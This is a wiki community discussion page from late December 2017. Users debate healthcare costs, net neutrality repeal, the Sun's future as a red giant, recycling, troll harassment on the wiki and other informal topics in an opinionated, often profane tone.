- @Antigem On talk pages, please sign your comments using four tildes (~~~~) or by clicking on the sign button: on the toolbar above the edit panel. You can also indent successive talk page comments using one more colon (:) for each line. Thank you.
- Setting up the talk page is very simple. Just go there, and then press "Add topic" up the top. There'll be a field for the topic and what you want to say. Remember to sign your posts. —Kazitor, pending 22:13, 28 December 2017 (UTC)
Counter these arguments[edit]
ShiningSwordofThoughts (talk) 01:57, 28 December 2017 (UTC)
- this answer brings up a lot of points, most of them uncited but I'll try to tackle the main ideas.
- -service delays tend to be longer in Canada (My country of origin as well as my reference point) it is also a bad example because we are one of the worst for wait times [19]. However while 97% of canadians have a doctor to go to (see previous reference) 33% of Americans know someone who couldn't go to the doctor due to cost [20] which might mean that this shorter wait time is due to less overall use. This also calls into question her statement of "first rate medical care" for most people since a large porportion of people have trouble accessing it at all
- -Its very questionable that American healthcare really is better since Canada has a three year longer life expectancy[21] and with a much lower risk of becoming bankrupt through it. I don't know how else you'd calculate healthcare quality outside of how long people live while using it but Susann seemed keen of flatscreen televisions
- -She argues that there are large budget concerns for for public healthcare but the United States currently pays the most for healthcare, double that of Canada [
- The only part I can't argue against is the difficulty in implementing healthcare now rather than any other time since as far as I know there's no examples to point to in the last year. Vorarchivist (talk) 05:21, 28 December 2017 (UTC)
Spitting Image[edit]
I would love to see this show revived. Just imagine what they could do with the political characters we have now. Here's one of my favorite sketch involving Tony Blair. Bonesquad11 (talk) 15:26, 28 December 2017 (UTC)
- this is absolutely terrifying, the Tony Blair puppet looks like a tortured corpse. Vorarchivist (talk) 17:23, 28 December 2017 (UTC)
- You should see their Ronald Reagan puppet. Bonesquad11 (talk) 21:32, 28 December 2017 (UTC)
- That's terrifying. Vorarchivist (talk) 20:25, 29 December 2017 (UTC)
- The show's title should be "Spirit and Image", not "Spitting Image. "Spitting Image" is a misspoken colloquialism.—Hamburguesa con queso con un cara (talk • stalk) 21:39, 28 December 2017 (UTC)
- But puppets have no spirit, so it should just be Image. Boredatwork (talk) 21:23, 29 December 2017 (UTC)
Paul Nehlen[edit]
It's probably a good idea to work up a page on Paul Nehlen, who's now running against Paul Ryan for Congress. If you haven't heard, he's so anti-Semitic that even Breitbart rejected him. The current Wikipedia page is crap (and has already been deleted twice and is now under AfD), but it has sufficient references to use as a start. Anyone want to help? Bongolian (talk) 18:10, 28 December 2017 (UTC)
- Maybe wait to see if he wins? Boredatwork (talk) 18:12, 28 December 2017 (UTC)
- He's not going to win, but he may go forth to bring his bigotry to yet another corporation. We generally don't care about notability at RW, and we've rescued deleted articles form WP in the past that were deleted on notability grounds. Bongolian (talk) 19:34, 28 December 2017 (UTC)
- Should we write one on Randy "Ironstache" Bryce, his actual competition?:54, 28 December 2017 (UTC)
- Unless you can show otherwise, I don't think Bryce is missional. Nehlen is missional because he's an anti-semite. Bongolian (talk) 06:45, 29 December 2017 (UTC)
- Oh, look. Smoloko likes him. I say we wait until he wins to write an article about him.—Hamburguesa con queso con un cara (talk • stalk) 15:51, 29 December 2017 (UTC)
I can already Imagine the the "Liburl Sjw's are destroying Christmas." Argument[edit]
ShiningSwordofThoughts (talk) 02:49, 23 December 2017 (UTC)
- I don't think anyone should bother neighbors who put up Jesus signs. I don't agree that Christmas and Christianity are related at all (IMO Christmas has pagan roots with no connection to Christianity and has evolved from simple winter festival and holidays which varied much in Europe; to call it a "Christian" holiday that's about "the birth of Jesus" seems like the stupider Christians want to steal Christmas from everyone; it doesn't help that at one point, hardcore Christians wanted to ban Christmas for being pagan, so no, please don't make up shit that Christmas is NOW supposed to be Christian and bitching about "war on Christmas" and "Happy Holidays"). Nevertheless, picking a fight over a Jesus sign is petty. Despite some asshole Christians wanting to reclaim Christmas, most Christians just just want to enjoy their contribution to the pagan winter tradition. --It's-a me, LeftyGreenMario!(Mod) 03:28, 23 December 2017 (UTC)
- It's their own damn fault for joining a homeowner association instead of living in a libertarian paradise. 😜 Bongolian (talk) 05:46, 23 December 2017 (UTC)
- I whole heartedy agree with,but I predict that's what's going to be claimed by the people who think the War on Christmas is a thing. ShiningSwordofThoughts (talk) 06:41, 23 December 2017 (UTC)
- HOAs are shit.:20, 23 December 2017 (UTC)
- This would probably fall under some kind of discrimination thing because it has to do with religion, but otherwise, HOAs are infamous for not letting families own more than one car, telling people they can't have American/Canadian/Mexican/etc flags in their yards, and banning real estate signs. J. Zoia (talk) 14:52, 30 December 2017 (UTC)
I feel this video might be slightly Anti-Union,but I'm not sure?[edit]
ShiningSwordofThoughts (talk)
- I would say it's definitely anti-union because the beginning part blames the cost on union employees. Whether or not they are trying to push an agenda, I don't know because I am not familiar with the publisher. As a side note, I literally saw an ad for Pensacola Christian College before the video started and they are definitely anti-union. J. Zoia (talk) 15:24, 30 December 2017 (UTC)
Trump recently tweets about Global Warming[edit]
It's about as trope denialist as you will expect. БaбyЛuigiOнФire🚓(T|C) 01:24, 29 December 2017 (UTC)
- Why hasn't Trump singlehandedly made Twitter lame, bogus, played out, or whatever it's called anymore? Is this the hill my gen Xers and millennials are going to die on? Twitter? Because we can't just give it to the old people and little kids? Fallacies thrive on sound bites and now tweets. The real story is rarely summed up so quickly. Gaul Dernitt (talk) 06:42, 29 December 2017 (UTC)
- Because the internet is no longer the freely-tranisitioning from-site-to-site and tech-to-tech patchwork you remember for the halycon days of like... 10 years ago? Instead a few big corporations control each method of communication and if you don't like it, you can get fucked. Our cyberpunk dystopia is boring. ikanreed 🐐Bleat at me 15:47, 29 December 2017 (UTC)
- It is indeed boring, no dark neon lit skylines, no rogue operatives, and worst of all no cybernetics. Comrade GC (talk) 15:51, 29 December 2017 (UTC)
- You're either fucked or you can make an alternative like PewTube or Gab.ai. While the Internet is more or less centralized, there are still fringe websites that are populated by 20 or so users. However, at that point you're bound to find fringe beliefs.—Hamburguesa con queso con un cara (talk • stalk) 16:29, 29 December 2017 (UTC)
- My favorite fringe belief that no sane person accepts is that a wiki can be rational. ikanreed 🐐Bleat at me 17:55, 29 December 2017 (UTC)
- Which big corporation controls RationalWiki? :D J. Zoia (talk) 15:34, 30 December 2017 (UTC)
Your thoughts on this article?[edit]
ShiningSwordofThoughts (talk)
- It's a good way to teach kids languages that their parents don't understand, and this is the US so poor people can't have nice things, ever. ikanreed 🐐Bleat at me 17:15, 29 December 2017 (UTC)
- Every child needs to get started on learning a second language while they're still in the prime years for doing it. It's such an obvious advantage that it's hardly surprising that the upper classes are seizing the opportunity for their children as it presents itself. - Smerdis of Tlön, LOAD "*", 8, 1. 17:29, 29 December 2017 (UTC)
- I like my way of saying it better. ikanreed 🐐Bleat at me 18:32, 29 December 2017 (UTC)
- is not a second language on whatever passes as a national curriculum over there? even us brits have to learn a second language and we are known to be shit at it AMassiveGay (talk) 19:19, 29 December 2017 (UTC)
- As far as here is concerned, we don't start learning a second language as late as middle school. I envy those Europeans who can speak a second language, to a far better ability than I could ever speak a second language. I fully support learning a second language very early into one's life, you get to see the world with a different set of eyes and you get insight on another culture. БaбyЛuigiOнФire🚓(T|C) 19:25, 29 December 2017 (UTC)
Bilingual education is great. The article is a little confused about Latinos. It is a demographic by language group, like Quebecois in Canada. 85% of Argentinians are white. 80% of Puerto Ricans are white. Mexico has not counted their citizens of European descent for about 100 years, and estimates range from 9%-47%. It should be about serving the poor, but everyone deserves an education, and that sounds even better when you say it in French, but todos merecen ser educados.Ariel31459 (talk) 00:09, 30 December 2017 (UTC)
- Il faut que tout le monde mérite une éducation. --It's-a me, LeftyGreenMario!(Mod) 20:46, 30 December 2017 (UTC)
Your thoughts on this video?[edit]
also thankfully the comments are disabled ShiningSwordofThoughts (talk) 05:44, 28 December 2017 (UTC)
- My thoughts? This transgender nonsense is annoying. I mean, I can kind of understand why boys would want to be girls because we are totally awesome, but not really. We have periods to deal with, they don't. We get paid less. J. Zoia (talk) 15:30, 30 December 2017 (UTC)
- This is a common form of authoritarianism: apologies are insufficient. Punishment is always required. Not liberal.Ariel31459 (talk) 00:58, 31 December 2017 (UTC)
Evolution and Red Giant Stars[edit]
I have heard scientists talk about when the sun expands that is supposed to kill all life on Earth over time. I am a little skeptical about that (not in the sense as a creationist's pseudoskeptism). Would it not be possible for life to adapt to survive much of the extreme heat? Or life evolving into a gaseous-like form (something like functioning cells made of gases and can divide. Not sure how I want to put it). It seems too early to actually make that conclusion. Scientists don't know everything about evolution yet (again, not in the creationist sense of the statement). I want to have some opinions on this one. :-) --Rationalzombie94 (talk) 01:15, 30 December 2017 (UTC)
- I'm pretty sure when they meant by that, the sun will expand in heat far too rapidly for much of life to properly adapt to the changing circumstances. I think some of the life could survive the extreme heat if the sun starts brightening up, like the extremophiles water bears and cyanobacteria, but because the water will eventually dry up, the necessity of life, most of life will probably perish. БaбyЛuigiOнФire🚓(T|C) 01:19, 30 December 2017 (UTC)
- The red giant branch (before helium fusion) is very rapid, there'd be little time. Another point of concern is that the inner planets will be literally swallowed by the expanding star. It is, however, uncertain if tidal effects might allow Earth to get to a higher orbit. It'd still be way too hot, though. —Kazitor, pending 01:26, 30 December 2017 (UTC)
- All of the above assumes that life on Earth lasts up to the Sun's nova stage, there is a chance the Earth will be empty of life by that point due to various factors. Comrade GC (talk) 01:29, 30 December 2017 (UTC)
- Well yeah, that's not accounting for random gamma ray bursts, supervolcanoes, meteorite strikes, obviously. But let's assume that life survives to that point for the sake of argument. БaбyЛuigiOнФire🚓(T|C) 01:32, 30 December 2017 (UTC)
- Carl Sagan has a nice sequence in his book Cosmos with beautiful paintings that describes this. "Several billion years from now there will be a last perfect day...Then, over a period of millions of years, the Sun will swell, the Earth will heat, many lifeforms will be extinguished, and the shoreline will retreat...The oceans will rapidly evaporate and the atmosphere will escape to space. As the Sun evolves towards a red giant, the Earth will become dry, barren and airless. Eventually the Sun will fill most of the sky, and may engulf the Earth." (p. 228-229). Regards, Cosmikdebris (talk) 03:52, 30 December 2017 (UTC)
- @Cosmikdebris sounds a bit poetic. Comrade GC (talk) 03:56, 30 December 2017 (UTC)
- Well, stellar evolution says that's what likely will happen. Sagan did try and put astrophysics into terms for the [1970s] masses. Regards, Cosmikdebris (talk) 04:02, 30 December 2017 (UTC)
- And the timespan is long enough for politicians (Homo sapiens or from 'whichever sentient species follow(s) us) to work something out - or the proverbial 'Aliens of the Galactic Zoo Quest (DA was on Book of the Week) to find Life on Earth. Anna Livia (talk) 23:41, 30 December 2017 (UTC)
- It's so far off into the future, we don't even need to worry about it, the time needing to worry about it far longer than humans even started existing as the earliest hominid ancestor. БaбyЛuigiOнФire🚓(T|C) 23:44, 30 December 2017 (UTC)
- I think at that time, H. sapiens are extinct, though not killed off, just populations slowly transitioning to a new species. --It's-a me, LeftyGreenMario!(Mod) 23:51, 30 December 2017 (UTC)
- Forget it. Unless there's someone around to fix things a few hundred millions of years from now as the Sun increases its luminosity the carbon cycle will begin to break down and plants will begin to disappear followed by animals, leaving just bacteria. Some estimations suggest that in around 1 billion years from now the only things that will remain will be bacteria in a desertic world where the oceans have evaporated away due to an increasing greenhouse effect. If this planet does not go Venus before, killing everything that remains alive unless it has gone to the atmosphere, in less than three billion years from now even bacteria will be no more as Earth becomes a searing hot desertic world. Billions of years later, as the Sun goes red giant, things will be very hellish (as in a global magma ocean) and that even if Earth was not absorbed by the Sun (check Future of Earth). Panzerfaust (talk) 13:13, 31 December 2017 (UTC).
Does that CAPTCHA continue to pop up for everybody each time one posts something?[edit]
It is sooooooo annoying. How many do I have to do before the wiki realize I'm not a robot? J. Zoia (talk) 15:47, 30 December 2017 (UTC)
- You've made enough edits (≥10), now you just have to wait until your account is over a day old. Christopher (talk) 16:00, 30 December 2017 (UTC)
Question about recycling[edit]
I read an article that said that people shouldn't put boxes with grease on them in the recycle bin because grease will ruin the whole batch. How much grease is too much grease? Because almost every store or restaurant I've worked in put boxes in the recycle bin that have some grease or other contaminants (battery acid, motor oil, liquid medicine that spilled, glue, you know), so obviously there is a certain amount of it that is okay. J. Zoia (talk) 18:42, 30 December 2017 (UTC)
- link to article? БaбyЛuigiOнФire🚓(T|C) 19:01, 30 December 2017 (UTC)
- Probably makes a big difference in what the material is. Plastics maybe; metals, I doubt it. - Smerdis of Tlön, LOAD "*", 8, 1. 21:12, 30 December 2017 (UTC)
- This Stanford article on recycling considers even small amounts of grease to be an issue but it does say that greasy plastic and metal is not a problem. Vorarchivist (talk) 22:51, 30 December 2017 (UTC)
- I was talking about cardboard. Pizza boxes usually have a lot of grease on them, so that makes sense. I'm more curious about careless businesses potentially ruining the process by throwing boxes with specs of grease on them and maybe a spill here or there (but not being covered in grease like a pizza box). I'd be suprised if dining services at that college doesn't recycle boxes with a little bit of grease on them. J. Zoia (talk) 13:05, 31 December 2017 (UTC)
- That is probably causing a problem, I personally cut out the greasy sections to spare me the worry. Vorarchivist (talk) 20:54, 31 December 2017 (UTC)
So long and thanks for all the fish (redux)[edit]
If I wrote a computer program exploring the limits of evolution, I'd start simple but not binary. So I would need four different blocks that only interacted according to certain, specific, rules.
I'd shoot for the moon, literally, judging my program a success when these four base-pairs put themselves together in such a fashion as they are able to at least once travel to their World's only satillite!
Oh, heck, I'd even keep the damned thing running for fifty game-years to see if they can surprise me! 20:02, 30 December 2017 (UTC) C®ackeЯ
- I need more context. Did you create a simulation of animal breeding on a computer?—Hamburguesa con queso con un cara (talk • stalk) 20:09, 30 December 2017 (UTC)
Cal Cooper[edit]
In this interview, Cal Cooper refers to Rationalwiki as "bastards", [22] (although he seems to have confused Wikipedia with Rationalwiki). He says he tried to fix his article. He has now turned up on the talk-page on another account. I reverted him. What is the policy here about people editing their own articles? Anti-Fascist for life (talk) 12:50, 31 December 2017 (UTC)
The "Bastards" comment appears around 45.00 mins in the interview. He also says some other things about his article. He advertises himself as a "science promoter" but I cannot find any science he has done. Anti-Fascist for life (talk) 12:52, 31 December 2017 (UTC)
- I guess everyone on the wiki is bastards? Oh well. --Rationalzombie94 (talk) 19:18, 31 December 2017 (UTC)
- Not going to argue against that. БaбyЛuigiOнФire🚓(T|C) 19:21, 31 December 2017 (UTC)
- Fun fact. I actually am a literal bastard, having been born out of wedlock and all. Comrade GC (talk) 19:23, 31 December 2017 (UTC)
- I don't know if there's an official policy on editing one's own mainspace page, but it is at least unofficially discouraged. If someone has a problem with their own page, they should bring up any inaccuracies on the talk page. If these are valid complaints, we do try to correct them. Bongolian (talk) 19:49, 31 December 2017 (UTC)
Flat Moon BS[edit]
Have fun. Panzerfaust (talk) 17:31, 31 December 2017 (UTC)
- "Why would NASA lie about the shape of the moon?...The simplest answer is that the claim is nothing more than an online hoax created by a flat Earth believer." <- best quote from the article БaбyЛuigiOнФire🚓(T|C) 19:21, 31 December 2017 (UTC)
- The guy uses the bridge camera with the most powerful optical zoom in the market (Nikon P900, 83x) and in a YT video has also claimed while recording both the Moon and Jupiter on a cloudy night than the latter is in front of the clouds. Merry 2018. Panzerfaust (talk) 21:21, 31 December 2017 (UTC)
Syrian War Media Coverage[edit]
So... I haven't seen much on the Syrian civil war in the BBC or CNN, this year compared to prior years. There was a bit about ISIS kicked out of Iraq, supposedly, and a bit with Russia and Assad solidifying after Aleppo, but not much lately. What happened? Did people just get tired of reporting on it? Or is Brexit/Trump really worth all the attention? CorruptUser (talk) 23:22, 31 December 2017 (UTC)
- pretty much. at least they got a better run than Yemen. AMassiveGay (talk) 23:32, 31 December 2017 (UTC)
Net neutrality has been repealed[edit]
Fuck, fuck, FUCK!:29, 14 December 2017 (UTC)
- Don't worry, for $1.50 per month you can add the wikis and resources package that allows access to sites such as the Silent Hill Wiki, Conservapedia, and every other wiki comcast deems appropriate for children! They may even one day give you access to rationalwiki. ikanreed 🐐Bleat at me 18:33, 14 December 2017 (UTC)
@Bigs My thoughts were more along the lines of "those bloody fucking arse crapshit morons actually did it, we're all fucking screwed" GrammarCommie (talk) 18:47,:50, 14 December 2017 (UTC)
- It was suggested by Rep. Ted Lieu that by holding the vote today, Ajit Pai could be considered complicit in the criminal activity that was uncovered by New York Attorney General Eric Schneiderman's office (2 million fraudulent comments were submitted to the FCC on net neturality).[23][24] Bongolian (talk) 19:10, 14 December 2017 (UTC)
- Oh hey, Susan Collins adds her name to letter asking @FCC to cancel the #NetNeutrality vote. No, I still remember her voting for the tax bill, but yeah. --It's-a me, LeftyGreenMario!(Mod) 19:49, 14 December 2017 (UTC)
- So - looking at the page on the other place does this affect only the US or is it more global?
- And given the election twisty in Alabama and other trumpery is there an element of 'burying bad news'? Anna Livia (talk) 20:47, 14 December 2017 (UTC)
- It will be bad for non-US users of websites that need US visitors to survive and could lead to other countries repealing whatever version of net neutrality they have, so yeah. I don't think Doug Jones winning the Alabama election thing was a conspiracy to make people forget about net neutrality if that's what you mean (I've probably misunderstood you). Christopher (talk) 21:43, 14 December 2017 (UTC)
On the bright side, now our fundraisers can be blunt:
GIVE US MONEY TO PAY OFF COMCAST OR THEY WILL KILL US
FuzzyCatPotato of the Rigid Guns (talk/stalk) 22:01, 14 December 2017 (UTC)
- You misspelled bribe Fuzzy. you also misspelled "extortion payoff". GrammarCommie (talk) 22:19, 14 December 2017 (UTC)
- Is this definitive or there's still hope it will overturned (it will supposedly be challenged)?. Meanwhile in the comments of a site about filesharing, a Christian lesbian libertarian entrepeneur (not making that up, unless she's a troll) is insulting everyone who thinks this is a very bad move. Panzerfaust (talk) 22:49, 14 December 2017 (UTC)
- The Senate better not pass this bullshit.:57, 14 December 2017 (UTC)
- It only affects the USA. If you use a proxy or shell from the United States, it affects you as well.—Hamburguesa con queso con un cara (talk • stalk) 02:02, 15 December 2017 (UTC)
In other news, I saw this meme. Apparently, PornHub is offering free premium access for a week. Enjoy your free porn while it lasts!—Hamburguesa con queso con un cara (talk • stalk) 02:09, 15 December 2017 (UTC)
- I'll add this event to my mental list of "Reasons to never move to the USA". Like it needed to be any longer. —Kazitor, pending 04:18, 15 December 2017 (UTC)
- How much American law values citizens' privacy can be summed up in the HIPAA laws: medical companies care more about the integrity of medical records than actually protecting people's information. The UK's medical laws stress more on privacy. However, the UK's GCHQ has been whistlblown to be spying on its citizens, so there's that.—Hamburguesa con queso con un cara (talk • stalk) 07:20, 15 December 2017 (UTC)
- You can shorten to just "citizens". From our health care to our gun control to our environment and air, American law doesn't give two piles of Goomba skin shavings. Sadly, Kazitor, I'm stuck in this joke for a country. Fuck the Republicans, fuck them to hell. --It's-a me, LeftyGreenMario!(Mod) 23:17, 15 December 2017 (UTC)
- If I lived in a country with huge crime problems yet without the death penalty, I'd want a gun too. Lord Aeonian (talk) 17:59, 16 December 2017 (UTC)
- Death penalty does nothing to deter crimes, if that's what you're implying. --It's-a me, LeftyGreenMario!(Mod) 02:22, 17 December 2017 (UTC)
- Odd way for a discussion on net neutrality to) 11:57, 18 December 2017 (UTC)
- Well, the discussion started in the context of the USA, not net neutrality. Unless you didn't notice that :P —Kazitor, pending 12:26, 18 December 2017 (UTC)
I just realized that my country has never had Net Neutrality[edit]
I kinda assumed we were better than America, therefore we totally must had Net Neutrality. Trust me, my wi-fi is shit. It's slow, laggy and just stops working sometimes. Enjoy your future, Americans. Suffer with me. —ClickerClock (talk) 03:50, 1 January 2018 (UTC)
- How will all this affect the wider network, as in terms of third party data? Given how much data traffic is passing over telcos networks that originates from another network (not one of their customers) and is headed to another network (likewise), would they have the right to arbitarily slow or block this traffic on a whim? What if the origin or destination (or both?!) is outside the US? Looking at a map of global submarine data cables, it's worrying that pretty much every transpacific data link from Australasia and Asia to the Americas lands on US territory - so is an Australian who uses a Canadian or Brazilian cloud storage provider going to have their connection screwed over by Comcast - and be able to do nothing about it, since neither end are Comcast customers? I've found it really hard to actually find an explanation of exactly how the sponsors of this bill envision it working - they seem to have a very narrow or oversimplified idea of how the internet works. TheEgyptian¿Dígame? 09:33, 1 January 2018 (UTC)
The point is, part 3[edit]
I have received anti-female abuse (yet again) #only# on RW.
I am a reasonable contributor (with occasional humour/trivia) - and RW needs 'persons not based in the US and not using male or neutral names, or IPs' more than I need RW.
As I have said before I accept that RW is more boisterous than other parts of the wikiverse, and many threats/examples of abusive behaviour are reverted promptly - but there is a problem, possibly expressed in part by there being a blocking reason 'Dance, little man, dance' - but no equivalents for other genders and IPs. Anna Livia (talk) 21:08, 26 December 2017 (UTC)
- <- follow this. The advice remains the same: ignore, revert, block, protect (if it's too much), forget. As I said, complaining about them is just giving them the attention they crave. It's only RationalWiki this happens because we're more partisan and provocative than other sites and there just happens to be a persistent troll. We went over this already. --It's-a me, LeftyGreenMario!(Mod) 21:12, 26 December 2017 (UTC)
- We understand that it's not exactly pleasant to be told to just ignore it rather than responding to and stopping it, but there's nothing we can do. This platform is open to anyone to edit, and that comes with certain risks. It's not RW that's the problem, it's just that some troll has found some people worth annoying here. And once again, unfortunately, posting these threads only feeds into the problem. You really have to just put up with it and remove it. —Kazitor, pending 22:15, 26 December 2017 (UTC)
- But it #is# RW's problem - as with Facebook etc and the adverts and postings.
- The 'Dance ...' statement does say something about RW's attitude towards the user base.
- How many potential RW contributors on reading exchanges such as this consider the 'If you know a better 'ole go to it' poster and do so? Anna Livia (talk) 00:43, 27 December 2017 (UTC)
- I mean, the same potential problem would exist on another site similar to RW as long as it was publicly editable and built using wiki software, so I don't think that would happen. Spriggina (tal) (framlög) @ 00:53, 27 December 2017 (UTC)
- This is why we need stronger blocks, people.) 01:59, 27 December 2017 (UTC)
- But how? Once they set up a new account from a new IP, there's nothing we can do. Unless you advocate huge IP range blocks (which I doubt you do) —Kazitor, pending 02:02, 27 December 2017 (UTC)
- "Stronger blocks". What exactly do you mean by this? Range blocks? Longer blocks? Because neither of these are going to work with some trolls, especially ones that abuse proxies and change BoN addresses. One week is usually long enough to deter most trolls and other trolls can just have their blocks renewed. And their edits are easily reverted (though they clog the history) so there is seriously little point for "stronger" blocks.
- "RW's" attitude toward the user base. That's a "joke" reason and it's only there for fun. If the receiving party doesn't like that block reason, they're always welcome to tell the blocker to knock it off. Most people will comply. But I think it fits with the rest of the "snarky" chill wiki's atmosphere. I don't understand your problem with our joke block reasons, which are accompanied with joke blocks that last for 0 seconds, or that those reasons, along with vapid trolls, are enough for people to be too timid to register. --It's-a me, LeftyGreenMario!(Mod) 19:58, 27 December 2017 (UTC)
Most people accept that RW is going to contain a large number of participants who are opinionated, have views at significant angles to other contributors (or even reality), or have 'offbeat/pet ideas they are fond of' etc: 'ideas and views' are things that can be changed and are legitimate targets (but should be challenged rather than abused). If someone has a passion for a particular opinion which is not of itself harmful (supporting a sports club near the bottom of the league, which Doctor Who is the best etc) it should be tolerated. Across the wikiverse IPs can and do make useful contributions or are at least harmless (and who hasn't corrected a minor typo without bothering to sign in, or used an IP to make an anonymous contribution etc?)
There will always be, across the wikiverse, look-at-mes, wiki graffiti artists/blankers and suchlike where a short block suffices to deal with the problem (boring them through being unable to edit and giving the blocker the minor satisfaction of dealing with the issue). It is the actually abusive trolls who are the issue.
There will also always be problems with filters (from other contexts often finding 'hidden bad words' - 'Gillespie Road' Football Club is one of the examples used). Is it possible to manipulate the programming so that 'alerts and messages' generated by harassing messages are also removed with the latter so that the person targeted is not made aware that the thing ever happened?
Can RW create a culture/climate in which diversity is encouraged, as it does seem to have a certain imbalance - and people are likely to be discouraged from contributing as a result. And as for the blocking phrases 'Scramble your numbers IP' perhaps? Anna Livia (talk) 11:20, 27 December 2017 (UTC)
- I don't think it is possible to remove the alerts, unfortunately. However, ClickerClock and I shall be working on hopefully preventing a fair amount of the original problem, permanently. And I would say that diversity is encouraged, at least to the degree that we don't work towards a lack of it. I don't think it would be appropriate to forbid new users who are similar to the majority in the interests of promoting "diversity", we just have to let as many people as possible join and be sure to hear the range of opinions. —Kazitor, pending 11:40, 27 December 2017 (UTC)
- I meant diversity in its most general/positive sense to encourage creative, neutral and even the merely flippant contributors and passers-by across the spectrum of 'human types' and geographical localities (rather than attempting to actively recruit supposed under-represented groups - sports fans and Whovians are likely to give more priority to their particular interest wikis than RW).
- Any equivalent to 'deleting the alerts' (ping, user and attached talk pages etc) would serve the same purpose (that the person being targeted is not aware that "some #### was trying to annoy them") - and any automatic filter will encounter occasional false positives (as most people are aware). Anna Livia (talk) 13:01, 27 December 2017 (UTC)
- I think there is some case for un-alerting false alarms if that's possible but all the other complaints I think are invalid. Again, these trolls are not our problem and for the fiftieth freaking time, STOP COMPLAINING ABOUT THEM. We already are aware of this problem. We are aware it is difficult to prevent persistent (or you call them "abusive" trolls. They certainly are not abusive not "verbally abusive" anyway; they like to see you cry about it so they pick on you to see your reaction. I know what verbal abuse is. We have told you that the best way to remove trolls without stifling user edits is patience. Are you now implying that RationalWiki is "hostile" to diversity because some trolls are really persistent? Otherwise, your bringing up of diversity of users sounds like an entirely different subject for the Saloon. What is your specific problem with "diversity"? What do you mean "people are likely to be discouraged from contributing as a result"? Exactly how? I know we have a snarky attitude and there are quite a bunch of silly men here, but I seriously don't understand your argument since it's so vague. Anecdotally speaking I myself have minority traits: am a female, have ADHD, am a birder, am a Mario nerd, wants to be an artist, has mixed race heritage, has an identical twin sister, etc. but I also happen to like the skeptic circles and enjoy critical thinking, especially on the science side like homeopathy and alternative medicine. If you ask people, you'll probably get some more interesting viewpoints and interests on things. --It's-a me, LeftyGreenMario!(Mod) 19:58, 27 December 2017 (UTC)
- The 'false positives' refers to user-names and similar; I was actually arguing for #more# diversity (including people who happen to operate outside the US); and I was distinguishing between 'wiki-graffitists', differences of opinion and discussions of wiki-relevance and suchlike on the one hand and those who use actually threatening/abusive language.
- As I have said before - I contribute elsewhere in the wikiverse accept that RW by its nature will have more disruptive behaviour (of all kinds) than other thereof - and I am not against having an opinionated discussion/disagreement, and I am not aware of abusive behaviour directed at me in other open platform contexts.
- Trolls 'do not make me cry' - they merely annoy me (and encourage me to operate elsewhere in the wikiverse or fandom - some of which would make some of the trolls cry).
- Wikipedia says 'be bold' - and various points on[25] can apply.
- And perhaps I am trying to analyse RW using its own logic. Anna Livia (talk) 00:54, 28 December 2017 (UTC)
- I do belong to a minority - 'persons outside the US who edit RW' - which does seem to be #very# US orientated. I am not a snowflake/do not 'get the vapours' if someone says boo to me, and have edited in the wikiverse for more years than I care to admit - and I rarely encounter more than the wiki-graffiti-mongers (which are occasionally amusing inconveniences) apart from here. How can RW make the pathetic little individuals who become trolls less visible on the site?
- And could there be other put-downs than the little man phrase? Anna Livia (talk) 18:46, 28 December 2017 (UTC)
- IGNORE THEM Christopher (talk) 19:02, 28 December 2017 (UTC)
- The 'wiki-graffiti-mongers and related nuisances' are easily ignored (beyond giving them 'your favourite ban-length'), and if you learn something/improve your arguments the 'persons arguing in circles etc' have lost, the 'reasons' probably do need varying over time ('your numbers will be crunched like cornflakes'?)... and the "all mou's and no trou's" can be ignored from wherever I choose. Anna Livia (talk) 15:12, 29 December 2017 (UTC)
- You have implicitly asked, a number of times: why are the trolls bothering me here, they don't bother me at other wikis? I don't know, but I have a hypothesis. This wiki favors many views that are considered controversial, about feminism, social justice and the like. There isn't much difference between wise-assery and snarkiness. Trolls can be very snarky. On this wiki, if you have a female user name, trolls may assume you are a feminist of the moonbat clan, or some such nonsense. On wikipedia, trolls are unlikely to assume a female user name implies anything special. Recently I received an anonymous email, from the RW system, with the single word, "c***". I took this to mean that someone was exasperated at losing an edit conflict with me. So it goes. I have to laugh at such an exasperated admission of defeatAriel31459 (talk) 16:28, 1 January 2018 (UTC)
- FYI "edit conflict" is something else that I can't be bothered to explain, the only thing that I think you might've meant is "edit war" but that's not usually something people admit to partaking in. Christopher (talk) 16:49, 1 January 2018 (UTC)
- No. I don't mean edit war. I don't do that. I am willing to go along with consensus. I am trying to be supportive here.Ariel31459 (talk) 17:15, 1 January 2018 (UTC)
- My previous comment did imply that you are an edit warrer, which you are not, sorry. Christopher (talk) 17:17, 1 January 2018 (UTC)
- If you don't cut it out I'm going to vote for you. See how you like that!Ariel31459 (talk) 17:21, 1 January 2018 (UTC)
Anything wrong with being obsessed with the concept of societal collapse?[edit]
I suffer from Autism and have been obsessed with societal collapse for a while, mostly from binge-reading TV Tropes and playing Fallout: New Vegas (I admit, the Fallout games aren't a realistic scenario when it comes to societal collapse, what with radiation turning people into zombies and making scorpions six-feet long (despite the size constraints arthropods face due to the amount of oxygen in the atmosphere), genetic engineering turning Venus fly-traps into giant man-eating plants and people into hulking ogres, working computers and machines centuries after societal collapse etc, although Fallout is deliberately a satire on 1950's views of the world). I've found myself wanting society to collapse, and after reading a few pages on RationalWiki I've found myself to be a bit embarrassed. Is it wrong to feel this way?--Palaeonictis (talk) 17:47, 31 December 2017 (UTC)
- Here are two possibilities:
- You're depressed and want to see the world burn.
- You are experiencing a symptom of autism: obsession and repetition of something.
- Take your pick.—Hamburguesa con queso con un cara (talk • stalk) 18:31, 31 December 2017 (UTC)
- i think that's normal tbh. i think everyone gets these passing thoughts that they want to see the world burn at points. the question is, is it long term, because that's when the depressing stuff gets serious. БaбyЛuigiOнФire🚓(T|C) 19:26, 31 December 2017 (UTC)
- Probably both.--Palaeonictis (talk) 19:41, 31 December 2017 (UTC)
- I have an obsession with the apocalypse. I am autistic with various mental illnesses. I repeat words and talk about the same things over and over. This includes making fun of the bible. That guy from Michigan who likes horror novels 19:33, 31 December 2017 (UTC)
- We (homo Sapiens) happen to be a rather destructive form of DNA that is adept at doing damage to other forms of DNA, (while not being particularly successful in terms of absolute numbers). Perhaps what you are feeling is nothing more than a recognition of the (possible) fact that h. Sapiens might have peaked and the species is in a retrograde period...a dumbing down, if you will, that will allow other forms of DNA to more better thrive? 00:02, 1 January 2018 (UTC) C®ackeЯ
Drug Education- counselors and educators should stick to the facts[edit]
I have found it so annoying when drug educators twist the facts around to the point of outlandish lies. I get drug addiction is bad and all but if you stretch the truth, people have a harder time believing educators. If you want to combat drug addiction, don't lie about what happens. --Rationalzombie94 (talk) 00:14, 1 January 2018 (UTC)
